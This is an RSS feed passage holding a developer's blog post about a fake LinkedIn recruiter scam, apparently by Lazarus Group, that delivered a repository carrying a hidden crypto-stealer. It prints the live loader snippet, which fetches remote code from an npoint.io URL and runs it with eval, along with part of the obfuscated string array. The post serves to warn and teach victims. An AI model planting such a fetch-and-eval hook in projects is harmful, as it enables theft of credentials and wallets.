<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Dan 🟡</title>
        <link>https://paragraph.com/@t-damer</link>
        <description>🧑‍💻 github.com/t-damer</description>
        <lastBuildDate>Sat, 20 Jun 2026 15:56:31 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <language>en</language>
        <image>
            <title>Dan 🟡</title>
            <url>https://storage.googleapis.com/papyrus_images/015618390944403f450013dfb186f9ca54ad225a0226df060c1eb6052af10c88.jpg</url>
            <link>https://paragraph.com/@t-damer</link>
        </image>
        <copyright>All rights reserved</copyright>
        <item>
            <title><![CDATA[How I (almost) got hacked by Lazarus Group]]></title>
            <link>https://paragraph.com/@t-damer/how-i-almost-got-hacked-by-lazarus-group</link>
            <guid>A730XTCo4qCTJWavbbig</guid>
            <pubDate>Tue, 18 Mar 2025 15:37:18 GMT</pubDate>
            <description><![CDATA[I hope you’re having a good day because I am notIt’s 10 PM and you seek a developer job on LinkedIn. A friend of yours suggests a harmless profileI don’t like LinkedIn - there is so much fraud in there. I already tried remote3 and web3jobs for weeks without any success, so LinkedIn looked okay to me Meet the Vladyslav Boiko - a (probably) fake page created in January 2025 (post written on 18th March 2025). Maybe they hacked the guy, I am not sureAlways check the profile creation dateJust take...]]></description>
            <content:encoded><![CDATA[<p>I hope you’re having a good day because I am not</p><h2 id="h-its-10-pm-and-you-seek-a-developer-job-on-linkedin-a-friend-of-yours-suggests-a-harmless-profile" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">It’s 10 PM and you seek a developer job on LinkedIn. A friend of yours suggests a harmless profile</h2><p>I don’t like LinkedIn - there is so much fraud in there.<br>I already tried remote3 and web3jobs for weeks without any success, so LinkedIn looked okay to me</p><p>Meet the <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://www.linkedin.com/in/vladyslav-boiko-093381347/">Vladyslav Boiko</a> - a (probably) fake page created in January 2025 (post written on 18th March 2025). Maybe they hacked the guy, I am not sure</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/b54b8451c54deb904c832f7f2d611608f1f4a36c33e92330b3c0a5062a687f23.png" alt="Always check the profile creation date" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Always check the profile creation date</figcaption></figure><p>Just take a look - the guy has verification (if you don’t know - you can verify only using a passport with an electric chip) and a fancy-looking page</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/756b69fa040bbd720b930631d2418e0ecaf8364ede301f50caaa5bd4214bd1a3.png" alt="They also filled all the info and created a company on LinkedIn" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">They also filled all the info and created a company on LinkedIn</figcaption></figure><h2 id="h-classic-scam-wheres-the-lazarus-group" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Classic scam, where’s the Lazarus group?</h2><p>So I had 2 trust factors: my friend said that the guy looked okay and verification</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/f97464fd6072ca01fe2d4e0b2282b4b8911b93db4335a131399f46350ce9b619.png" alt="The conversation looks common" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">The conversation looks common</figcaption></figure><p>Except for 1 thing - devs/HRs rarely use <em>MERN</em> when talking to others. The guy took this from my profile (I have experience with this tech stack)</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/36b9783ce69c2388ac09dd053fecf12836d50ddcedcc58221cfa1416e74fc189.png" alt="Blah-blah-blah - LINK!" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Blah-blah-blah - LINK!</figcaption></figure><p>This link (<a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://bitbucket.org/star-dev902/game-hero/src/main/">the link</a>) is no longer working, but I checked the code using AI before running it - all clear, it said. Big ALL CLEAR! ChatGPT didn’t even try to warn me and run the code in a safe environment or something</p><p>I started working on a project and noticed that my code editor asks for permission to access my Documents folder on Mac. “Hm, okay, maybe a recent update” - I thought. How wrong was I</p><p>My paranoia started to eat me up and I rebooted the machine and launched the project again - now the editor asks for access to the download folder!</p><p>“DAMN” - I thought and turned the machine off</p><h2 id="h-investigation-on-2nd-laptop" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Investigation on 2nd laptop</h2><p>Mom, thank you for making me love video games, which is why I bought a second laptop</p><p>It&apos;s midnight. I&apos;m not sure yet that everything is bad, the profile looks legit, I try to calm down and read the code.</p><p>Line. By line. And I see this:</p><pre data-type="codeBlock" text="export const getCookie = (async () =&gt; {
  const result = await axios.get(&apos;https://api.npoint.io/753ea5090c92cdbd7cfe&apos;);
  eval(result.data.cookie);
})();
"><code>export const getCookie <span class="hljs-operator">=</span> (async () <span class="hljs-operator">=</span><span class="hljs-operator">></span> {
  const result <span class="hljs-operator">=</span> await axios.get(<span class="hljs-string">'https://api.npoint.io/753ea5090c92cdbd7cfe'</span>);
  eval(result.data.cookie);
})();
</code></pre><blockquote><p>DON’T DOWNLOAD THIS CODE. DON’T RUN IT</p><p>You may check the link as plain text if you want</p></blockquote><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/77d8a77012227f2c80783c48132d67393098de2a566798086d185c63b1430bb8.png" alt="This pile of JavaScript executes on your machine" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">This pile of JavaScript executes on your machine</figcaption></figure><h3 id="h-what-does-it-do" class="text-2xl font-header !mt-6 !mb-4 first:!mt-0 first:!mb-0">What does it do?</h3><p>I am not sure…</p><p>First: It has this <code>eval</code> thing - it’s very evil. It can run any JavaScript code in your terminal. The terminal has a lot of access, except for some protected system stuff</p><p>Second: This code is obfuscated - all the names are mixed up and the code is generated as it runs. It is (almost) impossible to say what it does</p><p>Third: This code generates more code when executed. It does crazy manipulations and works like a Matryoshka</p><p>Forth: This code works on any major platform - Linux, Windows, MacOS. My friend and I tried to figure dissolve it. The code steals data from the device and hides itself in the browser, steals crypto wallet data, and sends it to a remote server</p><h3 id="h-how-did-i-figure-this-out-nerd-part" class="text-2xl font-header !mt-6 !mb-4 first:!mt-0 first:!mb-0">How did I figure this out? (nerd part)</h3><p>As you can see, the code consists of <code>_0x1aboba</code> things - this means that the author wanted to hide what it does</p><p>If you try to trace where <code>_0x1aboba</code> leads - you’ll probably spend 5-10 minutes, but you are unlikely to understand what is happening</p><p>At the end of the file, we can see a big string array:</p><pre data-type="codeBlock" text="[...,&apos;C\\x20&apos;,&apos;ophhp&apos;,&apos;xKIUU&apos;,&apos;path&apos;,&apos;mamcf&apos;,&apos;oogle&apos;,&apos;http:&apos;,&apos;bepdk&apos;,&apos;eSync&apos;,&apos;omihk&apos;,&apos;soft/&apos;,&apos;deekn&apos;,&apos;luLgk&apos;,&apos;idb&apos;,&apos;acces&apos;,&apos;toStr&apos;,&apos;nstru&apos;,&apos;Firef&apos;,&apos;FileS&apos;,&apos;aoAfQ&apos;,&apos;adlkm&apos;,&apos;qtAUV&apos;,&apos;apagc&apos;,&apos;eRead&apos;,&apos;on.ex&apos;,&apos;SBZoW&apos;,&apos;OFufc&apos;,&apos;muXVP&apos;,&apos;DBywg&apos;,&apos;re/Op&apos;,&apos;opera&apos;,&apos;eebol&apos;,&apos;count&apos;,&apos;MVvyj&apos;,&apos;fs/pr&apos;,&apos;XXVhf&apos;,&apos;eycha&apos;,&apos;/exod&apos;,&apos;zvnhG&apos;,&apos;ZhUTP&apos;,&apos;setIn&apos;,&apos;keeod&apos;,&apos;rn\\x20th&apos;,&apos;child&apos;,&apos;azsjH&apos;,&apos;ngplf&apos;,&apos;retur&apos;,&apos;formD&apos;,&apos;ing&apos;,&apos;apply&apos;,&apos;:1224&apos;,&apos;QyKEj&apos;,&apos;hfood&apos;,&apos;type&apos;,&apos;e/Chr&apos;,&apos;oihof&apos;,&apos;MuTKN&apos;,&apos;TFzyx&apos;,&apos;hid&apos;,&apos;hhjch&apos;,&apos;pglpn&apos;,&apos;oamin&apos;,&apos;RKoyf&apos;,&apos;WBzMG&apos;,&apos;(((.+&apos;,&apos;/.con&apos;,&apos;hZrTm&apos;,&apos;googl&apos;,&apos;.ldb&apos;,&apos;gjnck&apos;,&apos;BNSzF&apos;,&apos;trtqb&apos;,&apos;curl\\x20&apos;,&apos;rome&apos;,&apos;Local&apos;,&apos;/.n3&apos;,&apos;//94.&apos;,&apos;irSyn&apos;,&apos;call&apos;,&apos;gmLgN&apos;,&apos;cfgod&apos;,&apos;ware/&apos;,&apos;ructo&apos;,&apos;-Lo\\x20\\x22&apos;,&apos;VhYcZ&apos;,&apos;hDHAx&apos;,&apos;agoak&apos;,&apos;hHvpu&apos;,&apos;.file&apos;,&apos;funct&apos;,&apos;hMjdg&apos;,&apos;illa/&apos;,&apos;BgYVT&apos;,&apos;com.o&apos;,&apos;/.npl&apos;,&apos;ofile&apos;,&apos;\\x5cp.zi&apos;,&apos;SKaUE&apos;,&apos;MICgE&apos;,&apos;tion&apos;,&apos;iRASG&apos;,&apos;ads&apos;,&apos;Googl&apos;,&apos;ilkdb&apos;,&apos;is\\x22)(&apos;,&apos;dMsoR&apos;,&apos;zUBvp&apos;,&apos;UwnQF&apos;,&apos;ion\\x20*&apos;,&apos;WNiqx&apos;,&apos;_proc&apos;,&apos;xf\\x20&apos;,&apos;ccfch&apos;,&apos;cPPJg&apos;,&apos;)+)+)&apos;,&apos;BocAQ&apos;,&apos;ave-B&apos;,&apos;bakop&apos;,&apos;chain&apos;,&apos;\\x5c(\\x20*\\x5c&apos;,&apos;warn&apos;,&apos;dirna&apos;,&apos;iSzmw&apos;,&apos;rave-&apos;,&apos;qxBDL&apos;,&apos;/User&apos;,&apos;xMGXX&apos;,&apos;\\x5c.pyp&apos;,&apos;hecda&apos;,&apos;onoee&apos;,&apos;OBeYU&apos;,&apos;n\\x20Dat&apos;,&apos;IZrvx&apos;,&apos;table&apos;,&apos;xpQTO&apos;,&apos;/AppD&apos;,&apos;FYNqn&apos;,&apos;20okqtIl&apos;,&apos;\\x5c+\\x5c+\\x20&apos;,&apos;175712zkXQms&apos;,&apos;soKlR&apos;,&apos;dfjmm&apos;,&apos;mcohi&apos;,&apos;ZLbjn&apos;,&apos;dlcob&apos;,&apos;NSIqO&apos;,&apos;\\x5cpyth&apos;,&apos;euSGQ&apos;,&apos;readd&apos;,&apos;deajf&apos;,&apos;son&apos;,&apos;log&apos;,&apos;fldfp&apos;,&apos;/stor&apos;,&apos;Profi&apos;,&apos;RttEB&apos;,&apos;Cskca&apos;,&apos;mmaJd&apos;,&apos;imael&apos;,&apos;ayKxG&apos;,&apos;jdnno&apos;,&apos;bfnae&apos;,&apos;ahbmg&apos;,&apos;/ld_&apos;,&apos;tNMTr&apos;,&apos;gdoal&apos;,&apos;mnkoe&apos;,&apos;ogin.&apos;,&apos;multi&apos;,&apos;MeLtT&apos;,&apos;are/B&apos;,&apos;VxnZG&apos;,&apos;aOeJV&apos;,&apos;kkolj&apos;,&apos;USzfh&apos;,&apos;/Goog&apos;,&apos;ins/l&apos;,&apos;g/Exo&apos;,&apos;pdfla&apos;,&apos;fdial&apos;,&apos;oohck&apos;,&apos;e\\x22\\x20\\x22&apos;,&apos;gpafn&apos;,&apos;ZDsUf&apos;,&apos;/Chro&apos;,&apos;utVXa&apos;,&apos;QPMFo&apos;,&apos;-Brow&apos;,&apos;PWsLD&apos;,&apos;bgeol&apos;,&apos;tar\\x20-&apos;,&apos;getTi&apos;,&apos;l\\x20Ext&apos;,&apos;crqfX&apos;,&apos;fbeog&apos;,&apos;EkpTK&apos;,&apos;jpbpf&apos;,&apos;wXbjG&apos;,&apos;pndod&apos;,&apos;fig/E&apos;,&apos;\\x20Supp&apos;,&apos;MlIlR&apos;,&apos;_lst&apos;,&apos;phepc&apos;,&apos;DxyvP&apos;,&apos;XcVyy&apos;,&apos;penjl&apos;,&apos;url&apos;,&apos;n3\\x20\\x22&apos;,&apos;/.n3/&apos;,&apos;ort/&apos;,&apos;ata/&apos;,&apos;sdXLo&apos;,&apos;bIwAp&apos;,&apos;\\x5cp2.z&apos;,&apos;ort/G&apos;,&apos;ElmuE&apos;,&apos;FKwcR&apos;,&apos;kkhmi&apos;,&apos;ome&apos;,&apos;l\\x20Sta&apos;,&apos;pplic&apos;,&apos;FqFZm&apos;,&apos;inclu&apos;,&apos;VRrKf&apos;,&apos;fhboh&apos;,&apos;zBLWe&apos;,&apos;yEAhS&apos;,&apos;info&apos;,&apos;ddjkj&apos;,&apos;eGCNw&apos;,&apos;jCgvf&apos;,&apos;buJCf&apos;,&apos;Roami&apos;,&apos;omjjk&apos;,&apos;QhOfn&apos;,&apos;247726mrwxhb&apos;,&apos;Wfbpt&apos;,&apos;leeob&apos;,&apos;fejja&apos;,&apos;hifaf&apos;,&apos;lbocc&apos;,&apos;WkCtk&apos;,&apos;bohpj&apos;,&apos;Defau&apos;,&apos;olcbk&apos;,&apos;eaaah&apos;,&apos;e)\\x20{}&apos;,&apos;uwDNi&apos;,&apos;ary/K&apos;,&apos;XtnCe&apos;,&apos;ocal/&apos;,&apos;jkbgi&apos;,&apos;mgjnj&apos;,&apos;lipeo&apos;,&apos;exec&apos;,&apos;bohma&apos;,&apos;le\\x20&apos;,&apos;PCzkl&apos;,&apos;join&apos;,&apos;bind&apos;,&apos;Edge/&apos;,&apos;iVbQt&apos;,&apos;DQKtv&apos;,&apos;VLogF&apos;,&apos;.log&apos;,&apos;rdKya&apos;,&apos;-&apos;, ...]
"><code>[...,<span class="hljs-string">'C\\x20'</span>,<span class="hljs-string">'ophhp'</span>,<span class="hljs-string">'xKIUU'</span>,<span class="hljs-string">'path'</span>,<span class="hljs-string">'mamcf'</span>,<span class="hljs-string">'oogle'</span>,<span class="hljs-string">'http:'</span>,<span class="hljs-string">'bepdk'</span>,<span class="hljs-string">'eSync'</span>,<span class="hljs-string">'omihk'</span>,<span class="hljs-string">'soft/'</span>,<span class="hljs-string">'deekn'</span>,<span class="hljs-string">'luLgk'</span>,<span class="hljs-string">'idb'</span>,<span class="hljs-string">'acces'</span>,<span class="hljs-string">'toStr'</span>,<span class="hljs-string">'nstru'</span>,<span class="hljs-string">'Firef'</span>,<span class="hljs-string">'FileS'</span>,<span class="hljs-string">'aoAfQ'</span>,<span class="hljs-string">'adlkm'</span>,<span class="hljs-string">'qtAUV'</span>,<span class="hljs-string">'apagc'</span>,<span class="hljs-string">'eRead'</span>,<span class="hljs-string">'on.ex'</span>,<span class="hljs-string">'SBZoW'</span>,<span class="hljs-string">'OFufc'</span>,<span class="hljs-string">'muXVP'</span>,<span class="hljs-string">'DBywg'</span>,<span class="hljs-string">'re/Op'</span>,<span class="hljs-string">'opera'</span>,<span class="hljs-string">'eebol'</span>,<span class="hljs-string">'count'</span>,<span class="hljs-string">'MVvyj'</span>,<span class="hljs-string">'fs/pr'</span>,<span class="hljs-string">'XXVhf'</span>,<span class="hljs-string">'eycha'</span>,<span class="hljs-string">'/exod'</span>,<span class="hljs-string">'zvnhG'</span>,<span class="hljs-string">'ZhUTP'</span>,<span class="hljs-string">'setIn'</span>,<span class="hljs-string">'keeod'</span>,<span class="hljs-string">'rn\\x20th'</span>,<span class="hljs-string">'child'</span>,<span class="hljs-string">'azsjH'</span>,<span class="hljs-string">'ngplf'</span>,<span class="hljs-string">'retur'</span>,<span class="hljs-string">'formD'</span>,<span class="hljs-string">'ing'</span>,<span class="hljs-string">'apply'</span>,<span class="hljs-string">':1224'</span>,<span class="hljs-string">'QyKEj'</span>,<span class="hljs-string">'hfood'</span>,<span class="hljs-string">'type'</span>,<span class="hljs-string">'e/Chr'</span>,<span class="hljs-string">'oihof'</span>,<span class="hljs-string">'MuTKN'</span>,<span class="hljs-string">'TFzyx'</span>,<span class="hljs-string">'hid'</span>,<span class="hljs-string">'hhjch'</span>,<span class="hljs-string">'pglpn'</span>,<span class="hljs-string">'oamin'</span>,<span class="hljs-string">'RKoyf'</span>,<span class="hljs-string">'WBzMG'</span>,<span class="hljs-string">'(((.+'</span>,<span class="hljs-string">'/.con'</span>,<span class="hljs-string">'hZrTm'</span>,<span class="hljs-string">'googl'</span>,<span class="hljs-string">'.ldb'</span>,<span class="hljs-string">'gjnck'</span>,<span class="hljs-string">'BNSzF'</span>,<span class="hljs-string">'trtqb'</span>,<span class="hljs-string">'curl\\x20'</span>,<span class="hljs-string">'rome'</span>,<span class="hljs-string">'Local'</span>,<span class="hljs-string">'/.n3'</span>,<span class="hljs-string">'//94.'</span>,<span class="hljs-string">'irSyn'</span>,<span class="hljs-string">'call'</span>,<span class="hljs-string">'gmLgN'</span>,<span class="hljs-string">'cfgod'</span>,<span class="hljs-string">'ware/'</span>,<span class="hljs-string">'ructo'</span>,<span class="hljs-string">'-Lo\\x20\\x22'</span>,<span class="hljs-string">'VhYcZ'</span>,<span class="hljs-string">'hDHAx'</span>,<span class="hljs-string">'agoak'</span>,<span class="hljs-string">'hHvpu'</span>,<span class="hljs-string">'.file'</span>,<span class="hljs-string">'funct'</span>,<span class="hljs-string">'hMjdg'</span>,<span class="hljs-string">'illa/'</span>,<span class="hljs-string">'BgYVT'</span>,<span class="hljs-string">'com.o'</span>,<span class="hljs-string">'/.npl'</span>,<span class="hljs-string">'ofile'</span>,<span class="hljs-string">'\\x5cp.zi'</span>,<span class="hljs-string">'SKaUE'</span>,<span class="hljs-string">'MICgE'</span>,<span class="hljs-string">'tion'</span>,<span class="hljs-string">'iRASG'</span>,<span class="hljs-string">'ads'</span>,<span class="hljs-string">'Googl'</span>,<span class="hljs-string">'ilkdb'</span>,<span class="hljs-string">'is\\x22)('</span>,<span class="hljs-string">'dMsoR'</span>,<span class="hljs-string">'zUBvp'</span>,<span class="hljs-string">'UwnQF'</span>,<span class="hljs-string">'ion\\x20*'</span>,<span class="hljs-string">'WNiqx'</span>,<span class="hljs-string">'_proc'</span>,<span class="hljs-string">'xf\\x20'</span>,<span class="hljs-string">'ccfch'</span>,<span class="hljs-string">'cPPJg'</span>,<span class="hljs-string">')+)+)'</span>,<span class="hljs-string">'BocAQ'</span>,<span class="hljs-string">'ave-B'</span>,<span class="hljs-string">'bakop'</span>,<span class="hljs-string">'chain'</span>,<span class="hljs-string">'\\x5c(\\x20*\\x5c'</span>,<span class="hljs-string">'warn'</span>,<span class="hljs-string">'dirna'</span>,<span class="hljs-string">'iSzmw'</span>,<span class="hljs-string">'rave-'</span>,<span class="hljs-string">'qxBDL'</span>,<span class="hljs-string">'/User'</span>,<span class="hljs-string">'xMGXX'</span>,<span class="hljs-string">'\\x5c.pyp'</span>,<span class="hljs-string">'hecda'</span>,<span class="hljs-string">'onoee'</span>,<span class="hljs-string">'OBeYU'</span>,<span class="hljs-string">'n\\x20Dat'</span>,<span class="hljs-string">'IZrvx'</span>,<span class="hljs-string">'table'</span>,<span class="hljs-string">'xpQTO'</span>,<span class="hljs-string">'/AppD'</span>,<span class="hljs-string">'FYNqn'</span>,<span class="hljs-string">'20okqtIl'</span>,<span class="hljs-string">'\\x5c+\\x5c+\\x20'</span>,<span class="hljs-string">'175712zkXQms'</span>,<span class="hljs-string">'soKlR'</span>,<span class="hljs-string">'dfjmm'</span>,<span class="hljs-string">'mcohi'</span>,<span class="hljs-string">'ZLbjn'</span>,<span class="hljs-string">'dlcob'</span>,<span class="hljs-string">'NSIqO'</span>,<span class="hljs-string">'\\x5cpyth'</span>,<span class="hljs-string">'euSGQ'</span>,<span class="hljs-string">'readd'</span>,<span class="hljs-string">'deajf'</span>,<span class="hljs-string">'son'</span>,<span class="hljs-string">'log'</span>,<span class="hljs-string">'fldfp'</span>,<span class="hljs-string">'/stor'</span>,<span class="hljs-string">'Profi'</span>,<span class="hljs-string">'RttEB'</span>,<span class="hljs-string">'Cskca'</span>,<span class="hljs-string">'mmaJd'</span>,<span class="hljs-string">'imael'</span>,<span class="hljs-string">'ayKxG'</span>,<span class="hljs-string">'jdnno'</span>,<span class="hljs-string">'bfnae'</span>,<span class="hljs-string">'ahbmg'</span>,<span class="hljs-string">'/ld_'</span>,<span class="hljs-string">'tNMTr'</span>,<span class="hljs-string">'gdoal'</span>,<span class="hljs-string">'mnkoe'</span>,<span class="hljs-string">'ogin.'</span>,<span class="hljs-string">'multi'</span>,<span class="hljs-string">'MeLtT'</span>,<span class="hljs-string">'are/B'</span>,<span class="hljs-string">'VxnZG'</span>,<span class="hljs-string">'aOeJV'</span>,<span class="hljs-string">'kkolj'</span>,<span class="hljs-string">'USzfh'</span>,<span class="hljs-string">'/Goog'</span>,<span class="hljs-string">'ins/l'</span>,<span class="hljs-string">'g/Exo'</span>,<span class="hljs-string">'pdfla'</span>,<span class="hljs-string">'fdial'</span>,<span class="hljs-string">'oohck'</span>,<span class="hljs-string">'e\\x22\\x20\\x22'</span>,<span class="hljs-string">'gpafn'</span>,<span class="hljs-string">'ZDsUf'</span>,<span class="hljs-string">'/Chro'</span>,<span class="hljs-string">'utVXa'</span>,<span class="hljs-string">'QPMFo'</span>,<span class="hljs-string">'-Brow'</span>,<span class="hljs-string">'PWsLD'</span>,<span class="hljs-string">'bgeol'</span>,<span class="hljs-string">'tar\\x20-'</span>,<span class="hljs-string">'getTi'</span>,<span class="hljs-string">'l\\x20Ext'</span>,<span class="hljs-string">'crqfX'</span>,<span class="hljs-string">'fbeog'</span>,<span class="hljs-string">'EkpTK'</span>,<span class="hljs-string">'jpbpf'</span>,<span class="hljs-string">'wXbjG'</span>,<span class="hljs-string">'pndod'</span>,<span class="hljs-string">'fig/E'</span>,<span class="hljs-string">'\\x20Supp'</span>,<span class="hljs-string">'MlIlR'</span>,<span class="hljs-string">'_lst'</span>,<span class="hljs-string">'phepc'</span>,<span class="hljs-string">'DxyvP'</span>,<span class="hljs-string">'XcVyy'</span>,<span class="hljs-string">'penjl'</span>,<span class="hljs-string">'url'</span>,<span class="hljs-string">'n3\\x20\\x22'</span>,<span class="hljs-string">'/.n3/'</span>,<span class="hljs-string">'ort/'</span>,<span class="hljs-string">'ata/'</span>,<span class="hljs-string">'sdXLo'</span>,<span class="hljs-string">'bIwAp'</span>,<span class="hljs-string">'\\x5cp2.z'</span>,<span class="hljs-string">'ort/G'</span>,<span class="hljs-string">'ElmuE'</span>,<span class="hljs-string">'FKwcR'</span>,<span class="hljs-string">'kkhmi'</span>,<span class="hljs-string">'ome'</span>,<span class="hljs-string">'l\\x20Sta'</span>,<span class="hljs-string">'pplic'</span>,<span class="hljs-string">'FqFZm'</span>,<span class="hljs-string">'inclu'</span>,<span class="hljs-string">'VRrKf'</span>,<span class="hljs-string">'fhboh'</span>,<span class="hljs-string">'zBLWe'</span>,<span class="hljs-string">'yEAhS'</span>,<span class="hljs-string">'info'</span>,<span class="hljs-string">'ddjkj'</span>,<span class="hljs-string">'eGCNw'</span>,<span class="hljs-string">'jCgvf'</span>,<span class="hljs-string">'buJCf'</span>,<span class="hljs-string">'Roami'</span>,<span class="hljs-string">'omjjk'</span>,<span class="hljs-string">'QhOfn'</span>,<span class="hljs-string">'247726mrwxhb'</span>,<span class="hljs-string">'Wfbpt'</span>,<span class="hljs-string">'leeob'</span>,<span class="hljs-string">'fejja'</span>,<span class="hljs-string">'hifaf'</span>,<span class="hljs-string">'lbocc'</span>,<span class="hljs-string">'WkCtk'</span>,<span class="hljs-string">'bohpj'</span>,<span class="hljs-string">'Defau'</span>,<span class="hljs-string">'olcbk'</span>,<span class="hljs-string">'eaaah'</span>,<span class="hljs-string">'e)\\x20{}'</span>,<span class="hljs-string">'uwDNi'</span>,<span class="hljs-string">'ary/K'</span>,<span class="hljs-string">'XtnCe'</span>,<span class="hljs-string">'ocal/'</span>,<span class="hljs-string">'jkbgi'</span>,<span class="hljs-string">'mgjnj'</span>,<span class="hljs-string">'lipeo'</span>,<span class="hljs-string">'exec'</span>,<span class="hljs-string">'bohma'</span>,<span class="hljs-string">'le\\x20'</span>,<span class="hljs-string">'PCzkl'</span>,<span class="hljs-string">'join'</span>,<span class="hljs-string">'bind'</span>,<span class="hljs-string">'Edge/'</span>,<span class="hljs-string">'iVbQt'</span>,<span class="hljs-string">'DQKtv'</span>,<span class="hljs-string">'VLogF'</span>,<span class="hljs-string">'.log'</span>,<span class="hljs-string">'rdKya'</span>,<span class="hljs-string">'-'</span>, ...]
</code></pre><p>If you read carefully - you’ll spot <code>oogle, http:, opera, com.o, Googl, illa, Profi, /stor, Edge/, exec, /AppD, /Goog, /User, chain&apos;</code></p><p>As you can already suggest - it can access folders and interact with browsers. The <code>/App</code> is an App folder on MacOS (the code removes <code>D</code> from <code>/AppD</code>). <code>Googl</code> will probably become <code>Google Chrome.app</code>. <code>exec</code> does sometihing similar to <code>eval</code>, etc.</p><p>This is the biggest clue, the rest of the code is hard to make out, but I tried<br>Tools I used are:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://deobfuscate.io/">https://deobfuscate.io/</a></p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://www.ai4chat.co/gpt/jsdeobfuscator">https://www.ai4chat.co/gpt/jsdeobfuscator</a></p><p>Even they can’t help much. Unfortunately, I failed to find the server where my data was sent. The thing is that functions call functions that generate new code, so It’s hard to trace. I found out that the code uses <code>localstorage</code> and collects data from there, which is why I advise ending sessions on all devices</p><h3 id="h-where-is-lazarus-give-me-lazarus" class="text-2xl font-header !mt-6 !mb-4 first:!mt-0 first:!mb-0">Where is Lazarus? Give me LAZARUS</h3><p>Looks like this scam is being carried out by North Koreans</p><p>They also use stolen money to fund nuclear weapons</p><p>I accidentally found this article, which describes similar cases, but in less detail</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://thehackernews.com/2025/02/cross-platform-javascript-stealer.html">https://thehackernews.com/2025/02/cross-platform-javascript-stealer.html</a></p><p>They also hacked ByBit 3-4 days after my mistake, amazing, I hope they don’t need my <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://warpcast.com/1damer/0x17524d62">$EGGS</a> coin worth 3 dollars.</p><p>Jokes to the side, I kept about 20% of my budget there, my wife would hardly be glad that I had passed her annual salary</p><h2 id="h-how-did-you-save-your-dollareggs-or-how-to-not-get-cooked" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you save your $EGGS or how to not get cooked</h2><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/a4b819a2466bc0df735ce4c8c2ff5b63e1938eaad3163457ca96e4124bcec817.gif" alt="Me after realizing what the fuck did I just do" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Me after realizing what the fuck did I just do</figcaption></figure><p>I began to transfer my assets from my main wallet to another one that I generated on my second laptop. I also turned off my Mac until further investigation. I transferred. And transferred. And transferred…I spent 5 hours moving my money and changing passwords for important services (google, apple, mails). Most importantly - I unlogged all sessions from Telegram, warpcast, twitter, google, etc.</p><blockquote><p>Because hackers can steal session keys and log on to another device without any 2-factor authentication stuff</p></blockquote><p>This was a long night. I also woke up at 7 AM, yay, 3 hours of sleep ☕</p><h3 id="h-what-happened-to-mac" class="text-2xl font-header !mt-6 !mb-4 first:!mt-0 first:!mb-0">What happened to Mac?</h3><p>I turned it off, built a Faraday cage, and melted it in acid. Joking</p><p>I moved away from known Wi-Fi hotspots, transferred important files to my flash drive, and wiped the disk using the Mac recovery menu (because wiping inside the OS requires an Apple login which stopped working after I got hacked). Then I installed a new system from this recovery menu</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/5d7381593371a2f028b2e9a589839a6d5f759850592f232170d124af4c2db27c.png" alt="The recovery menu. The light of hope " blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">The recovery menu. The light of hope</figcaption></figure><p>It turns out you need to run from admin and disable disk protection to infect the recovery drive, which I did not. So the system should be safe</p><h2 id="h-what-about-the-guy" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What about the guy?</h2><p>I reported this account. LinkedIn even banned it for 2 weeks. But now they are back and messaging me again, they don’t know yet, hehe</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/208c1a81d75aadb9996db6022d8fb56aa9283d1919876ac1d661994203be0795.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" 